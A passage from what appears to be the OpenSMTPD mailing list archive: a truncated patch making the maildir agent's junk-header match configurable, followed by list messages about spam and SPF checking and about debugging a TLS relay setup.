+Scan message for
+.Ar header
+and move to Junk folder if result is positive.
 .El
 .Sh EXIT STATUS
 .Ex -std mail.maildir
Index: mail.maildir.c
===
RCS file: /cvs/src/usr.sbin/smtpd/mail.maildir.c,v
retrieving revision 1.7
diff -u -p -u -r1.7 mail.maildir.c
--- mail.maildir.c    24 Oct 2018 19:26:23 -    1.7
+++ mail.maildir.c    24 Nov 2018 16:58:03 -
@@ -37,23 +37,25 @@

 static int    maildir_subdir(const char *, char *, size_t);
 static void    maildir_mkdirs(const char *);
-static void    maildir_engine(const char *, int);
+static void    maildir_engine(const char *, int, const char *);
 static int    mkdirs_component(const char *, mode_t);
 static int    mkdirs(const char *, mode_t);

 int
 main(int argc, char *argv[])
 {
-    int    ch;
-    int    junk = 0;
+    int     ch;
+    int     junk = 0;
+    char    *header = NULL;

 if (! geteuid())
     errx(1, "mail.maildir: may not be executed as root");

-    while ((ch = getopt(argc, argv, "j")) != -1) {
+    while ((ch = getopt(argc, argv, "j:")) != -1) {
     switch (ch) {
     case 'j':
         junk = 1;
+            header = optarg;
         break;
     default:
         break;
@@ -65,7 +67,7 @@ main(int argc, char *argv[])
 if (argc > 1)
     errx(1, "mail.maildir: only one maildir is allowed");

-    maildir_engine(argv[0], junk);
+    maildir_engine(argv[0], junk, header);

 return (0);
 }
@@ -107,7 +109,7 @@ maildir_mkdirs(const char *dirname)
 }

 static void
-maildir_engine(const char *dirname, int junk)
+maildir_engine(const char *dirname, int junk, const char *header)
 {
 char    rootpath[PATH_MAX];
 char    junkpath[PATH_MAX];
@@ -182,7 +184,7 @@ maildir_engine(const char *dirname, int
     line[strcspn(line, "\n")] = '\0';
     if (line[0] == '\0')
         in_hdr = 0;
-        if (junk && in_hdr && strcmp(line, "X-Spam: yes") == 0)
+        if (junk && in_hdr && strcmp(line, header) == 0)
         is_junk = 1;
     fprintf(fp, "%s\n", line);
 }
Index: smtpd.conf.5
===
RCS file: /cvs/src/usr.sbin/smtpd/smtpd.conf.5,v
retrieving revision 1.206
diff -u -p -u -r1.206 smtpd.conf.5
--- smtpd.conf.5    8 Oct 2018 06:10:17 -    1.206
+++ smtpd.conf.5    24 Nov 2018 16:58:03 -
@@ -128,7 +128,7 @@ Optionally,
 might be specified to use the
 recipient email address (after expansion) instead of the
 local user in the LMTP session as RCPT TO.
-.It Cm maildir Op Ar pathname Op Cm junk
+.It Cm maildir Op Ar pathname Op Cm junk header
 Deliver the message to the maildir in
 .Ar pathname
 if specified, or by default to
@@ -142,7 +142,8 @@ may contain format specifiers that are e
 If the
 .Cm junk
 argument is provided, the message will be moved to the Junk
-folder if it contains a positive X-Spam header.
+folder if it contains a positive match for the provided
+.Ar header .
 .It Cm mbox
 Deliver the message to the user's mbox with
 .Xr mail.local 8 .
Index: parse.y
===
RCS file: /cvs/src/usr.sbin/smtpd/parse.y,v
retrieving revision 1.230
diff -u -p -u -r1.230 parse.y
--- parse.y    8 Nov 2018 13:24:22 -    1.230
+++ parse.y    24 Nov 2018 16:58:04 -
@@ -662,8 +662,8 @@ MBOX {
 | MAILDIR {
 asprintf(>u.local.command, "/usr/libexec/mail.maildir");
 } dispatcher_local_options
-| MAILDIR JUNK {
-    asprintf(>u.local.command, "/usr/libexec/mail.maildir -j");
+| MAILDIR JUNK STRING {
+    asprintf(>u.local.command, "/usr/libexec/mail.maildir 
-j \"%s\"", $3);

 } dispatcher_local_options
 | MAILDIR STRING {
 if (strncmp($2, "~/", 2) == 0)
@@ -673,13 +673,13 @@ MBOX {
     asprintf(>u.local.command,
         "/usr/libexec/mail.maildir \"%s\"", $2);
 } dispatcher_local_options
-| MAILDIR STRING JUNK {
+| MAILDIR STRING JUNK STRING{
 if (strncmp($2, "~/", 2) == 0)
     asprintf(>u.local.command,
-            "/usr/libexec/mail.maildir -j \"%%{user.directory}/%s\"", 
$2+2);
+            "/usr/libexec/mail.maildir -j \"%s\" 
\"%%{user.directory}/%s\"", $4, $2+2);

 else
     asprintf(>u.local.command,
-            

Re: Spam, SPF check and SRS?

2018-11-14 Thread Edgar Pettijohn

On Nov 14, 2018 1:28 PM, Henry Jensen  wrote:
>
> Hi,
>
> new OpenSMTPD user here. I did (and still do) administrate Debian with Exim for several years and wanted to try something different. 
>
> So I got myself a server with OpenBSD and OpenSMTPD.
>
> So far I am impressed that a fully functional and secure SMTP server can be configured with such a small config file:) Congrats to the devs.
>
> Now that basic functionality is accomplished I want to try more. Of course I found config snippets here and there, but I think some parts of the puzzle are still missing and I still can't see the whole picture. Additionally most of the examples online are in the old syntax format.
>
> 1. Spam checking: I know there are solutions which do include spamd, Spamassasin and pf. Whats the best practice and what about rspamd?
>
Once the filtering code gets committed I think we will have endless possibilities for spam checking.
> 2. SPF checking: I think, this should also be done by the spam filter?
>
See above.
> 3. Sender Rewriting Scheme (SRS): SPF is breaking mail forwarding in some cases, and the solution to this is SRS. How can this be done with OpenSMTPD?
>
I don't know. :(
Edgar
> Kind regards,
>
> Henry
>
>
>



tls debugging

2018-11-13 Thread Edgar Pettijohn III

I have the following line on my laptops smtpd.conf:

action "relay" relay host "smtp+tls//label@domain:587" auth  
tls no-verify


I had to add the no-verify for some reason with the upgrade to 6.4. I 
was trying to figure out why tls was failing, so I started testing with 
openssl s_client and it wasn't being very useful. I looked at the logs 
on the server and this is what it shows:


Nov 13 21:47:40 mail smtpd[37181]: bee1391f24a23978 smtp failed-command 
address=50.55.65.87 host=50.55.65.87 command="pipelining" result="500 
5.5.1 Invalid command: Command unrecognized"
Nov 13 21:47:50 mail smtpd[37181]: bee1391f24a23978 smtp disconnected 
address=50.55.65.87 host=50.55.65.87 reason=disconnect


I'm not sure if this is an smtpd bug or an s_client bug or neither.


Thanks,


Edgar


--
You received this mail because you are subscribed to misc@opensmtpd.org
To unsubscribe, send a mail to: misc+unsubscr...@opensmtpd.org



  1   2   3   >